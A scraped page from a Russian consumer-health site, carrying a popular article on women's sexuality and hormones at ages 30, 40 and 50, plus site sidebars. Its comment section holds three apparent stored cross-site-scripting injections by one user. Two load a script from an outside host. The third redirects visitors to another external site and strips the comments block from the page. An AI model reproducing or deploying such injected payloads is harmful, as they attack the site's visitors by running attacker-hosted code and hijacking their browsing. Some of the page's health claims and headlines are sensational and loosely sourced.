Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Правила секса в 30, 40, 5...  >>  Правила секса в 30, 40, 50 лет
 
Обратная связь
 

Правила секса в 30, 40, 50 лет

Размер шрифта
04 мая 2015 00:00
  • google_analytics: false
  • Нравится

Правила секса в 30 лет

30 лет: преимущества

В 30 лет женщины находятся на пике своей чувственности, несмотря на начавшееся снижение уровней прогестерона, эстрогена и тестостерона. Они уже знают, чего хотят, не стесняются своего тела и уверены в себе. А ведь это самое главное в постели, не правда ли?

30 лет: трудности

После родов выделение тестостерона резко понижается, а лактация подавляет овуляцию вместе с синтезом эстрогена и прогестерона. В связи с этим секса может просто не хотеться. Подсказать решение? Это мастурбация. Она улучшает кровоснабжение половых органов и повышает синтез необходимых гормонов.

40 лет: преимущества

В это сложно поверить, но специалисты утверждают, что в период падения уровней половых гормонов женщины начинают испытывать повышенное либидо. Они чаще фантазируют о сексе и претворяют свои фантазии в жизнь, чем женщины младшего возраста. Ученые объясняют это тем, что женский организм хочет воспользоваться последней возможностью завести ребенка.

40 лет: трудности

Перименопауза – это переходный период, длящийся несколько лет, перед тем, как прекратятся менструации. Колебание уровней тестостерона, эстрогена и прогестерона в перименопаузу может снижать либидо, вызывать приливы и нерегулярные месячные.

40 лет: трудности

Чтобы несколько сгладить неприятные проявления перименопаузы, врач может порекомендовать вам прием низкодозированных гормональных препаратов для нормализации нестабильного уровня эстрогена. При наличии сухости и дискомфорта во влагалище рекомендуется применение местных гормональных препаратов в виде свечей и кремов, например, Овестина.

 Правила секса в 50 лет

50 лет: преимущества

Некоторые авторы называют возраст 50-65 лет кульминацией взрослой жизни. Вы удивитесь, но 71% опрошенных в возрасте 50-60 лет (больше, чем в какой-либо другой возрастной группе) признались, что их последний секс закончился оргазмом. Есть еще порох в пороховницах!

50 лет: трудности

Резкий недостаток тестостерона и эстрогена вызывает значительное снижение либидо. Тем не менее, при желании можно его восстановить. Вам помогут специальная гормонозаместительная терапия, препараты тестостерона в виде крема, геля или пластыря и другие средства. Следует помнить, что эффективность этих средств для повышения либидо ставится под сомнение. Возможно развитие побочных эффектов.

50 лет: трудности

Чем больше у вас лишних килограммов, тем меньше у вас тестостерона! Если вы страдаете ожирением, снижение массы тела на 10% может преобразить вашу сексуальную жизнь! Кроме того, всего 20 минут спортивных упражнений улучшают кровоснабжение гениталий, предотвращая сухость и дискомфорт во влагалище.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:11

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Правила секса в 50 лет   Сексуальное белье не единственная возможность почувствовать себя женственной!   Стыдные вопросы про секс   В 45 баба ягодка опять  
26 апреля 2013Не заставляйте мужчин убираться дома! Последнее исследование показало, что у таких пар меньше секса! 12 декабря 2012Гормон оргазма не дает мужчинам изменять
 
18 сентября 2012Нет презерватива? Будет рак простаты! 09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 

Слайдшоу

1
Как вернуть секс в вашу жизнь
Как оставаться сексуальной в 45
Вся правда о климаксе

Тесты

Как облегчить менопаузу?
Здорова ли ваша предстательная железа
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.